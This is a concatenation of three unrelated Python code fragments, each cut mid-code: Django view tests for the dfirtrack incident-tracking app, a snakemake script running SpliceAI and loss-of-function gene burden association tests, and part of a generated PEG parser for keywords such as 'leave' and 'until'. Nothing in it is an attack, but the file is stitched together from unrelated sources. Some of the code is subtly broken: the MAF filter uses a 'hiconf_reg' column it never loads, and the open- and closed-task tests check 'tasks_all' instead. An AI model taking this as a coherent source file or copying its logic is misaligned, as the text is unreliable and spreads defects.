response = self.client.get('/system/', follow=True)
# compare
self.assertRedirects(
response, destination, status_code=302, target_status_code=200
)
def test_system_list_logged_in(self):
"""test list view"""
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/')
# compare
self.assertEqual(response.status_code, 200)
def test_system_list_template(self):
"""test list view"""
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/system/system_list.html')
def test_system_list_get_user_context(self):
"""test list view"""
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_system')
def test_system_list_redirect(self):
"""test list view"""
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# create url
destination = urllib.parse.quote('/system/', safe='/')
# get response
response = self.client.get('/system', follow=True)
# compare
self.assertRedirects(
response, destination, status_code=301, target_status_code=200
)
def test_system_list_context_with_api(self):
"""test list view"""
# add app to dfirtrack.settings
if 'dfirtrack_api' not in installed_apps:
installed_apps.append('dfirtrack_api')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/')
# compare
self.assertTrue(response.context['dfirtrack_api'])
def test_system_list_context_without_api(self):
"""test list view"""
# remove app from dfirtrack.settings
if 'dfirtrack_api' in installed_apps:
installed_apps.remove('dfirtrack_api')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/')
# compare
self.assertFalse(response.context['dfirtrack_api'])
def test_system_detail_not_logged_in(self):
"""test detail view"""
# get object
system_1 = System.objects.get(system_name='system_1')
# create url
destination = '/login/?next=' + urllib.parse.quote(
'/system/' + str(system_1.system_id) + '/', safe=''
)
# get response
response = self.client.get(
'/system/' + str(system_1.system_id) + '/', follow=True
)
# compare
self.assertRedirects(
response, destination, status_code=302, target_status_code=200
)
def test_system_detail_logged_in(self):
"""test detail view"""
# get object
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertEqual(response.status_code, 200)
def test_system_detail_template(self):
"""test detail view"""
# get object
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/system/system_detail.html')
def test_system_detail_get_user_context(self):
"""test detail view"""
# get object
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_system')
def test_system_detail_redirect(self):
"""test detail view"""
# get object
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# create url
destination = urllib.parse.quote(
'/system/' + str(system_1.system_id) + '/', safe='/'
)
# get response
response = self.client.get('/system/' + str(system_1.system_id), follow=True)
# compare
self.assertRedirects(
response, destination, status_code=301, target_status_code=200
)
def test_system_detail_context_workflows(self):
"""test detail view"""
# add app to dfirtrack.settings
if 'dfirtrack_config' not in installed_apps:
installed_apps.append('dfirtrack_config')
# get object
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get(f'/system/{system_1.system_id}/')
# compare
self.assertEqual(str(response.context['workflows'][0]), 'workflow_1')
def test_system_detail_context_artifacts_all(self):
"""test detail view"""
# get objects
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertTrue(
response.context['artifacts_all']
.filter(artifact_name='artifact_open_system_1')
.exists()
)
self.assertTrue(
response.context['artifacts_all']
.filter(artifact_name='artifact_closed_system_1')
.exists()
)
self.assertFalse(
response.context['artifacts_all']
.filter(artifact_name='artifact_open_system_2')
.exists()
)
self.assertFalse(
response.context['artifacts_all']
.filter(artifact_name='artifact_closed_system_2')
.exists()
)
self.assertEqual(len(response.context['artifacts_all']), 2)
def test_system_detail_context_artifacts_open(self):
"""test detail view"""
# get objects
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertTrue(
response.context['artifacts_open']
.filter(artifact_name='artifact_open_system_1')
.exists()
)
self.assertFalse(
response.context['artifacts_open']
.filter(artifact_name='artifact_closed_system_1')
.exists()
)
self.assertFalse(
response.context['artifacts_open']
.filter(artifact_name='artifact_open_system_2')
.exists()
)
self.assertFalse(
response.context['artifacts_open']
.filter(artifact_name='artifact_closed_system_2')
.exists()
)
self.assertEqual(len(response.context['artifacts_open']), 1)
def test_system_detail_context_artifacts_closed(self):
"""test detail view"""
# get object
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertFalse(
response.context['artifacts_closed']
.filter(artifact_name='artifact_open_system_1')
.exists()
)
self.assertTrue(
response.context['artifacts_closed']
.filter(artifact_name='artifact_closed_system_1')
.exists()
)
self.assertFalse(
response.context['artifacts_closed']
.filter(artifact_name='artifact_open_system_2')
.exists()
)
self.assertFalse(
response.context['artifacts_closed']
.filter(artifact_name='artifact_closed_system_2')
.exists()
)
self.assertEqual(len(response.context['artifacts_closed']), 1)
def test_system_detail_context_tasks_all(self):
"""test detail view"""
# get objects
taskname_00_blocked_system_1 = Taskname.objects.get(
taskname_name='task_00_blocked_system_1'
)
taskname_10_pending_system_1 = Taskname.objects.get(
taskname_name='task_10_pending_system_1'
)
taskname_20_working_system_1 = Taskname.objects.get(
taskname_name='task_20_working_system_1'
)
taskname_30_done_system_1 = Taskname.objects.get(
taskname_name='task_30_done_system_1'
)
taskname_40_skipped_system_1 = Taskname.objects.get(
taskname_name='task_40_skipped_system_1'
)
taskname_00_blocked_system_2 = Taskname.objects.get(
taskname_name='task_00_blocked_system_2'
)
taskname_10_pending_system_2 = Taskname.objects.get(
taskname_name='task_10_pending_system_2'
)
taskname_20_working_system_2 = Taskname.objects.get(
taskname_name='task_20_working_system_2'
)
taskname_30_done_system_2 = Taskname.objects.get(
taskname_name='task_30_done_system_2'
)
taskname_40_skipped_system_2 = Taskname.objects.get(
taskname_name='task_40_skipped_system_2'
)
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_00_blocked_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_10_pending_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_20_working_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_30_done_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_40_skipped_system_1)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_00_blocked_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_10_pending_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_20_working_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_30_done_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_40_skipped_system_2)
.exists()
)
self.assertEqual(len(response.context['tasks_all']), 5)
def test_system_detail_context_tasks_open(self):
"""test detail view"""
# get objects
taskname_00_blocked_system_1 = Taskname.objects.get(
taskname_name='task_00_blocked_system_1'
)
taskname_10_pending_system_1 = Taskname.objects.get(
taskname_name='task_10_pending_system_1'
)
taskname_20_working_system_1 = Taskname.objects.get(
taskname_name='task_20_working_system_1'
)
taskname_30_done_system_1 = Taskname.objects.get(
taskname_name='task_30_done_system_1'
)
taskname_40_skipped_system_1 = Taskname.objects.get(
taskname_name='task_40_skipped_system_1'
)
taskname_00_blocked_system_2 = Taskname.objects.get(
taskname_name='task_00_blocked_system_2'
)
taskname_10_pending_system_2 = Taskname.objects.get(
taskname_name='task_10_pending_system_2'
)
taskname_20_working_system_2 = Taskname.objects.get(
taskname_name='task_20_working_system_2'
)
taskname_30_done_system_2 = Taskname.objects.get(
taskname_name='task_30_done_system_2'
)
taskname_40_skipped_system_2 = Taskname.objects.get(
taskname_name='task_40_skipped_system_2'
)
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_00_blocked_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_10_pending_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_20_working_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_30_done_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_40_skipped_system_1)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_00_blocked_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_10_pending_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_20_working_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_30_done_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_40_skipped_system_2)
.exists()
)
self.assertEqual(len(response.context['tasks_open']), 3)
def test_system_detail_context_tasks_closed(self):
"""test detail view"""
# get object
taskname_00_blocked_system_1 = Taskname.objects.get(
taskname_name='task_00_blocked_system_1'
)
taskname_10_pending_system_1 = Taskname.objects.get(
taskname_name='task_10_pending_system_1'
)
taskname_20_working_system_1 = Taskname.objects.get(
taskname_name='task_20_working_system_1'
)
taskname_30_done_system_1 = Taskname.objects.get(
taskname_name='task_30_done_system_1'
)
taskname_40_skipped_system_1 = Taskname.objects.get(
taskname_name='task_40_skipped_system_1'
)
taskname_00_blocked_system_2 = Taskname.objects.get(
taskname_name='task_00_blocked_system_2'
)
taskname_10_pending_system_2 = Taskname.objects.get(
taskname_name='task_10_pending_system_2'
)
taskname_20_working_system_2 = Taskname.objects.get(
taskname_name='task_20_working_system_2'
)
taskname_30_done_system_2 = Taskname.objects.get(
taskname_name='task_30_done_system_2'
)
taskname_40_skipped_system_2 = Taskname.objects.get(
taskname_name='task_40_skipped_system_2'
)
system_1 = System.objects.get(system_name='system_1')
# login testuser
self.client.login(username='testuser_system', password='<PASSWORD>')
# get response
response = self.client.get('/system/' + str(system_1.system_id) + '/')
# compare
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_00_blocked_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_10_pending_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_20_working_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_30_done_system_1)
.exists()
)
self.assertTrue(
response.context['tasks_all']
.filter(taskname=taskname_40_skipped_system_1)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_00_blocked_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_10_pending_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_20_working_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_30_done_system_2)
.exists()
)
self.assertFalse(
response.context['tasks_all']
.filter(taskname=taskname_40_skipped_system_2)
.exists()
)
self.assertEqual(len(response.context['tasks_closed']), 2)
def test_system_detail_context_with_api(self):
"""test detail view"""
# add app to dfirtrack.settings
if 'dfirtrack_api' not in installed_apps:
installed_apps.append('dfirtrack_api')
# get object
system_1 = System.objects.get(system_name='system_1')
# login | |
import os
# os.environ["OMP_NUM_THREADS"] = "16"
import logging
logging.basicConfig(filename=snakemake.log[0], level=logging.INFO)
import pandas as pd
import numpy as np
# seak imports
from seak.data_loaders import intersect_ids, EnsemblVEPLoader, VariantLoaderSnpReader, CovariatesLoaderCSV
from seak.scoretest import ScoretestNoK
from seak.lrt import LRTnoK, pv_chi2mixture, fit_chi2mixture
from pysnptools.snpreader import Bed
import pickle
import sys
from util.association import BurdenLoaderHDF5
from util import Timer
class GotNone(Exception):
pass
# set up the covariatesloader
covariatesloader = CovariatesLoaderCSV(snakemake.params.phenotype,
snakemake.input.covariates_tsv,
snakemake.params.covariate_column_names,
sep='\t',
path_to_phenotypes=snakemake.input.phenotypes_tsv)
# initialize the null models
Y, X = covariatesloader.get_one_hot_covariates_and_phenotype('noK')
null_model_score = ScoretestNoK(Y, X)
null_model_lrt = LRTnoK(X, Y)
# set up function to filter variants:
def maf_filter(mac_report):
# load the MAC report, keep only observed variants with MAF below threshold
mac_report = pd.read_csv(mac_report, sep='\t', usecols=['SNP', 'MAF', 'Minor', 'alt_greater_ref'])
if snakemake.params.filter_highconfidence:
vids = mac_report.SNP[(mac_report.MAF < snakemake.params.max_maf) & (mac_report.Minor > 0) & ~(mac_report.alt_greater_ref.astype(bool)) & (mac_report.hiconf_reg.astype(bool))]
else:
vids = mac_report.SNP[(mac_report.MAF < snakemake.params.max_maf) & (mac_report.Minor > 0) & ~(mac_report.alt_greater_ref.astype(bool))]
# this has already been done in filter_variants.py
# load the variant annotation, keep only variants in high-confidece regions
# anno = pd.read_csv(anno_tsv, sep='\t', usecols=['Name', 'hiconf_reg'])
# vids_highconf = anno.Name[anno.hiconf_reg.astype(bool).values]
# vids = np.intersect1d(vids, vids_highconf)
return mac_report.set_index('SNP').loc[vids]
def get_regions():
# load the results, keep those below a certain p-value
results = pd.read_csv(snakemake.input.results_tsv, sep='\t')
kern = snakemake.params.kernels
if isinstance(kern, str):
kern = [kern]
pvcols_score = ['pv_score_' + k for k in kern ]
pvcols_lrt = ['pv_lrt_' + k for k in kern]
statcols = ['lrtstat_' + k for k in kern]
results = results[['gene', 'n_snp', 'cumMAC', 'nCarrier'] + statcols + pvcols_score + pvcols_lrt]
# get genes below threshold
genes = [results.gene[results[k] < 1e-7].values for k in pvcols_score + pvcols_lrt ]
genes = np.unique(np.concatenate(genes))
if len(genes) == 0:
return None
# set up the regions to loop over for the chromosome
regions = pd.read_csv(snakemake.input.regions_bed, sep='\t', header=None, usecols=[0 ,1 ,2 ,3, 5], dtype={0 :str, 1: np.int32, 2 :np.int32, 3 :str, 5:str})
regions.columns = ['chrom', 'start', 'end', 'name', 'strand']
regions['strand'] = regions.strand.map({'+': 'plus', '-': 'minus'})
regions = regions.set_index('name').loc[genes]
regions = regions.join(results.set_index('gene'), how='left').reset_index()
return regions
# genotype path, vep-path:
assert len(snakemake.params.ids) == len (snakemake.input.bed), 'Error: length of chromosome IDs does not match length of genotype files'
geno_vep = zip(snakemake.params.ids, snakemake.input.bed, snakemake.input.vep_tsv, snakemake.input.ensembl_vep_tsv, snakemake.input.mac_report, snakemake.input.h5_lof, snakemake.input.iid_lof, snakemake.input.gid_lof)
# get the top hits
regions_all = get_regions()
if regions_all is None:
logging.info('No genes pass significance threshold, exiting.')
sys.exit(0)
# where we store the results
stats = []
i_gene = 0
# enter the chromosome loop:
timer = Timer()
for i, (chromosome, bed, vep_tsv, ensembl_vep_tsv, mac_report, h5_lof, iid_lof, gid_lof) in enumerate(geno_vep):
if chromosome.replace('chr','') not in regions_all.chrom.unique():
continue
# set up the ensembl vep loader for the chromosome
spliceaidf = pd.read_csv(vep_tsv,
sep='\t',
usecols=['name', 'chrom', 'end', 'gene', 'max_effect', 'DS_AG', 'DS_AL', 'DS_DG', 'DS_DL', 'DP_AG', 'DP_AL', 'DP_DG', 'DP_DL'],
index_col='name')
# get set of variants for the chromosome:
mac_report = maf_filter(mac_report)
filter_vids = mac_report.index.values
# filter by MAF
keep = intersect_ids(filter_vids, spliceaidf.index.values)
spliceaidf = spliceaidf.loc[keep]
spliceaidf.reset_index(inplace=True)
# filter by impact:
spliceaidf = spliceaidf[spliceaidf.max_effect >= snakemake.params.min_impact]
# set up the regions to loop over for the chromosome
regions = regions_all.copy()
# discard all genes for which we don't have annotations
gene_ids = regions.name.str.split('_', expand=True) # table with two columns, ensembl-id and gene-name
regions['gene'] = gene_ids[1] # this is the gene name
regions['ensembl_id'] = gene_ids[0]
regions.set_index('gene', inplace=True)
genes = intersect_ids(np.unique(regions.index.values), np.unique(spliceaidf.gene)) # intersection of gene names
regions = regions.loc[genes].reset_index() # subsetting
regions = regions.sort_values(['chrom', 'start', 'end'])
# check if the variants are protein LOF variants, load the protein LOF variants:
ensemblvepdf = pd.read_csv(ensembl_vep_tsv, sep='\t', usecols=['Uploaded_variation', 'Gene'])
# this column will contain the gene names:
genes = intersect_ids(np.unique(ensemblvepdf.Gene.values), regions.ensembl_id) # intersection of ensembl gene ids
ensemblvepdf = ensemblvepdf.set_index('Gene').loc[genes].reset_index()
ensemblvepdf['gene'] = gene_ids.set_index(0).loc[ensemblvepdf.Gene.values].values
# set up the merge
ensemblvepdf.drop(columns=['Gene'], inplace=True) # get rid of the ensembl ids, will use gene names instead
ensemblvepdf.rename(columns={'Uploaded_variation': 'name'}, inplace=True)
ensemblvepdf['is_plof'] = 1.
ensemblvepdf = ensemblvepdf[~ensemblvepdf.duplicated()] # if multiple ensembl gene ids map to the same gene names, this prevents a crash.
# we add a column to the dataframe indicating whether the variant is already annotated as protein loss of function by the ensembl variant effect predictor
spliceaidf = pd.merge(spliceaidf, ensemblvepdf, on=['name', 'gene'], how='left', validate='one_to_one')
spliceaidf['is_plof'] = spliceaidf['is_plof'].fillna(0.).astype(bool)
# initialize the loader
# Note: we use "end" here because the start + 1 = end, and we need 1-based coordiantes (this would break if we had indels)
eveploader = EnsemblVEPLoader(spliceaidf['name'], spliceaidf['chrom'].astype('str') + ':' + spliceaidf['end'].astype('str'), spliceaidf['gene'], data=spliceaidf[['max_effect', 'is_plof', 'DS_AG', 'DS_AL', 'DS_DG', 'DS_DL', 'DP_AG', 'DP_AL', 'DP_DG', 'DP_DL']].values)
# set up the variant loader (splice variants) for the chromosome
plinkloader = VariantLoaderSnpReader(Bed(bed, count_A1=True, num_threads=4))
plinkloader.update_variants(eveploader.get_vids())
plinkloader.update_individuals(covariatesloader.get_iids())
# set up the protein LOF burden loader
bloader_lof = BurdenLoaderHDF5(h5_lof, iid_lof, gid_lof)
bloader_lof.update_individuals(covariatesloader.get_iids())
# set up the splice genotype + vep loading function
def get_splice(interval):
try:
V1 = eveploader.anno_by_interval(interval, gene=interval['name'].split('_')[1])
except KeyError:
raise GotNone
if V1.index.empty:
raise GotNone
vids = V1.index.get_level_values('vid')
V1 = V1.droplevel(['gene'])
temp_genotypes, temp_vids = plinkloader.genotypes_by_id(vids, return_pos=False)
temp_genotypes -= np.nanmean(temp_genotypes, axis=0)
G1 = np.ma.masked_invalid(temp_genotypes).filled(0.)
ncarrier = np.sum(G1 > 0.5, axis=0)
cummac = mac_report.loc[vids].Minor
# spliceAI max score
weights = V1[0].values.astype(np.float64)
is_plof = V1[1].values.astype(bool)
splice_preds_all = V1.iloc[:,2:]
splice_preds_all.columns = ['DS_AG', 'DS_AL', 'DS_DG', 'DS_DL', 'DP_AG', 'DP_AL', 'DP_DG', 'DP_DL']
# "standardized" positions -> codon start positions
# pos = V1[0].values.astype(np.int32)
return G1, vids, weights, ncarrier, cummac, is_plof, splice_preds_all
# set up the protein-LOF loading function
def get_plof(interval):
try:
G2 = bloader_lof.genotypes_by_id(interval['name']).astype(np.float)
except KeyError:
G2 = None
return G2
# set up the test-function for a single gene
def test_gene(interval, seed):
pval_dict = {}
pval_dict['gene'] = interval['name']
called = []
def pv_score(GV):
pv = null_model_score.pv_alt_model(GV)
if pv < 0.:
pv = null_model_score.pv_alt_model(GV, method='saddle')
return pv
def call_score(GV, name, vids=None):
if name not in pval_dict:
pval_dict[name] = {}
called.append(name)
pval_dict[name] = {}
# single-marker p-values
pval_dict[name]['pv_score'] = np.array([pv_score(GV[:,i,np.newaxis]) for i in range(GV.shape[1])])
# single-marker coefficients
beta = [ null_model_score.coef(GV[:,i,np.newaxis]) for i in range(GV.shape[1]) ]
pval_dict[name]['beta'] = np.array([x['beta'][0,0] for x in beta])
pval_dict[name]['betaSd'] = np.array([np.sqrt(x['var_beta'][0,0]) for x in beta])
if vids is not None:
pval_dict[name]['vid'] = vids
def call_lrt(GV, name, vids=None):
if name not in pval_dict:
pval_dict[name] = {}
called.append(name)
# get gene parameters, test statistics and and single-marker regression weights
lik = null_model_lrt.altmodel(GV)
pval_dict[name]['nLL'] = lik['nLL']
pval_dict[name]['sigma2'] = lik['sigma2']
pval_dict[name]['lrtstat'] = lik['stat']
pval_dict[name]['h2'] = lik['h2']
logdelta = null_model_lrt.model1.find_log_delta(GV.shape[1])
pval_dict[name]['log_delta'] = logdelta['log_delta']
pval_dict[name]['coef_random'] = null_model_lrt.model1.getPosteriorWeights(logdelta['beta'], logdelta=logdelta['log_delta'])
if vids is not None:
pval_dict[name]['vid'] = vids
# load splice variants
G1, vids, weights, ncarrier, cummac, is_plof, splice_preds_all = get_splice(interval)
# keep indicates which variants are NOT "protein LOF" variants, i.e. variants already identified by the ensembl VEP
keep = ~is_plof
# these are common to all kernels
pval_dict['vid'] = vids
pval_dict['weights'] = weights
pval_dict['MAC'] = cummac
pval_dict['nCarrier'] = ncarrier
pval_dict['not_LOF'] = keep
for col in splice_preds_all.columns:
pval_dict[col] = splice_preds_all[col].values.astype(np.float32)
# single-variant p-values:
call_score(G1, 'variant_pvals') # single variant p-values and coefficients estimated independently
call_lrt(G1.dot(np.diag(np.sqrt(weights), k=0)), 'variant_pvals') # single variant coefficients estimated *jointly* after weighting
# sanity checks
assert len(vids) == interval['n_snp'], 'Error: number of variants does not match! expected: {} got: {}'.format(interval['n_snp'], len(vids))
assert cummac.sum() == interval['cumMAC'], 'Error: cumMAC does not match! expeced: {}, got: {}'.format(interval['cumMAC'], cummac.sum())
# do a score burden test (max weighted), this is different than the baseline!
G1_burden = np.max(np.where(G1 > 0.5, np.sqrt(weights), 0.), axis=1, keepdims=True)
call_score(G1_burden, 'linwb')
call_lrt(G1_burden, 'linwb')
# linear weighted kernel
G1 = G1.dot(np.diag(np.sqrt(weights), k=0))
# do a score test (linear weighted)
call_score(G1, 'linw', vids=vids)
call_lrt(G1, 'linw')
# load plof burden
G2 = get_plof(interval)
if G2 is not None:
call_score(G2, 'LOF')
call_lrt(G2, 'LOF')
if np.any(keep):
# merged (single variable)
G1_burden_mrg = np.maximum(G2, G1_burden)
call_score(G1_burden_mrg, 'linwb_mrgLOF')
call_lrt(G1_burden_mrg, 'linwb_mrgLOF')
# concatenated ( >= 2 variables)
# we separate out the ones that are already part of the protein LOF variants!
G1 = np.concatenate([G1[:, keep], G2], axis=1)
call_score(G1, 'linw_cLOF', vids=np.array(vids[keep].tolist() + [-1]))
call_lrt(G1, 'linw_cLOF')
else:
logging.info('All Splice-AI variants for gene {} where already identified by the Ensembl variant effect predictor'.format(interval['name']))
return pval_dict, called
logging.info('loaders for chromosome {} initialized in {:.1f} seconds.'.format(chromosome, timer.check()))
# run tests for all genes on the chromosome
for _, region in regions.iterrows():
try:
gene_stats, called = test_gene(region, i_gene)
except GotNone:
continue
# build the single-variant datafame
single_var_columns = ['gene', 'vid', 'weights', 'MAC', 'nCarrier', 'not_LOF', 'DS_AG', 'DS_AL', | |
+ 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[ \\t]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = self._actions.ignore(self._input, index1, self._offset, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['_'][index0] = (address0, self._offset)
return address0
def _read_eol(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['eol'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
remaining0, index2, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
address1 = self._read_comment()
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index2:self._offset], index2, elements0)
self._offset = self._offset
else:
address0 = FAILURE
if address0 is FAILURE:
self._offset = index1
remaining1, index3, elements1, address2 = 1, self._offset, [], True
while address2 is not FAILURE:
chunk0, max0 = None, self._offset + 1
if max0 <= self._input_size:
chunk0 = self._input[self._offset:max0]
if chunk0 is not None and Grammar.REGEX_4.search(chunk0):
address2 = TreeNode(self._input[self._offset:self._offset + 1], self._offset, [])
self._offset = self._offset + 1
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[\\n\\r\\f]')
if address2 is not FAILURE:
elements1.append(address2)
remaining1 -= 1
if remaining1 <= 0:
address0 = self._actions.ignore(self._input, index3, self._offset, elements1)
self._offset = self._offset
else:
address0 = FAILURE
if address0 is FAILURE:
self._offset = index1
self._cache['eol'][index0] = (address0, self._offset)
return address0
def _read_keyword(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['keyword'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1 = self._offset
index2, elements0 = self._offset, []
address1 = FAILURE
chunk0, max0 = None, self._offset + 5
if max0 <= self._input_size:
chunk0 = self._input[self._offset:max0]
if chunk0 == 'leave':
address1 = TreeNode(self._input[self._offset:self._offset + 5], self._offset, [])
self._offset = self._offset + 5
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'leave\'')
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
index3 = self._offset
chunk1, max1 = None, self._offset + 1
if max1 <= self._input_size:
chunk1 = self._input[self._offset:max1]
if chunk1 is not None and Grammar.REGEX_5.search(chunk1):
address2 = TreeNode(self._input[self._offset:self._offset + 1], self._offset, [])
self._offset = self._offset + 1
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[0-9a-zA-Z_]')
self._offset = index3
if address2 is FAILURE:
address2 = TreeNode(self._input[self._offset:self._offset], self._offset, [])
self._offset = self._offset
else:
address2 = FAILURE
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index2
else:
elements0 = None
self._offset = index2
if elements0 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index2:self._offset], index2, elements0)
self._offset = self._offset
if address0 is FAILURE:
self._offset = index1
index4, elements1 = self._offset, []
address3 = FAILURE
chunk2, max2 = None, self._offset + 5
if max2 <= self._input_size:
chunk2 = self._input[self._offset:max2]
if chunk2 == 'until':
address3 = TreeNode(self._input[self._offset:self._offset + 5], self._offset, [])
self._offset = self._offset + 5
else:
address3 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'until\'')
if address3 is not FAILURE:
elements1.append(address3)
address4 = FAILURE
index5 = self._offset
chunk3, max3 = None, self._offset + 1
if max3 <= self._input_size:
chunk3 = self._input[self._offset:max3]
if chunk3 is not None and Grammar.REGEX_6.search(chunk3):
address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset, [])
self._offset = self._offset + 1
else:
address4 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[0-9a-zA-Z_]')
self._offset = index5
if address4 is FAILURE:
address4 = TreeNode(self._input[self._offset:self._offset], self._offset, [])
self._offset = self._offset
else:
address4 = FAILURE
if address4 is not FAILURE:
elements1.append(address4)
else:
elements1 = None
self._offset = index4
else:
elements1 = None
self._offset = index4
if elements1 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index4:self._offset], index4, elements1)
self._offset = self._offset
if address0 is FAILURE:
self._offset = index1
index6, elements2 = self._offset, []
address5 = FAILURE
chunk4, max4 = None, self._offset + 2
if max4 <= self._input_size:
chunk4 = self._input[self._offset:max4]
if chunk4 == 'do':
address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset, [])
self._offset = self._offset + 2
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'do\'')
if address5 is not FAILURE:
elements2.append(address5)
address6 = FAILURE
index7 = self._offset
chunk5, max5 = None, self._offset + 1
if max5 <= self._input_size:
chunk5 = self._input[self._offset:max5]
if chunk5 is not None and Grammar.REGEX_7.search(chunk5):
address6 = TreeNode(self._input[self._offset:self._offset + 1], self._offset, [])
self._offset = self._offset + 1
else:
address6 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[0-9a-zA-Z_]')
self._offset = index7
if address6 is FAILURE:
address6 = TreeNode(self._input[self._offset:self._offset], self._offset, [])
self._offset = self._offset
else:
address6 = FAILURE
if address6 is not FAILURE:
elements2.append(address6)
else:
elements2 = None
self._offset = index6
else:
elements2 = None
self._offset = index6
if elements2 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index6:self._offset], index6, elements2)
self._offset = self._offset
if address0 is FAILURE:
self._offset = index1
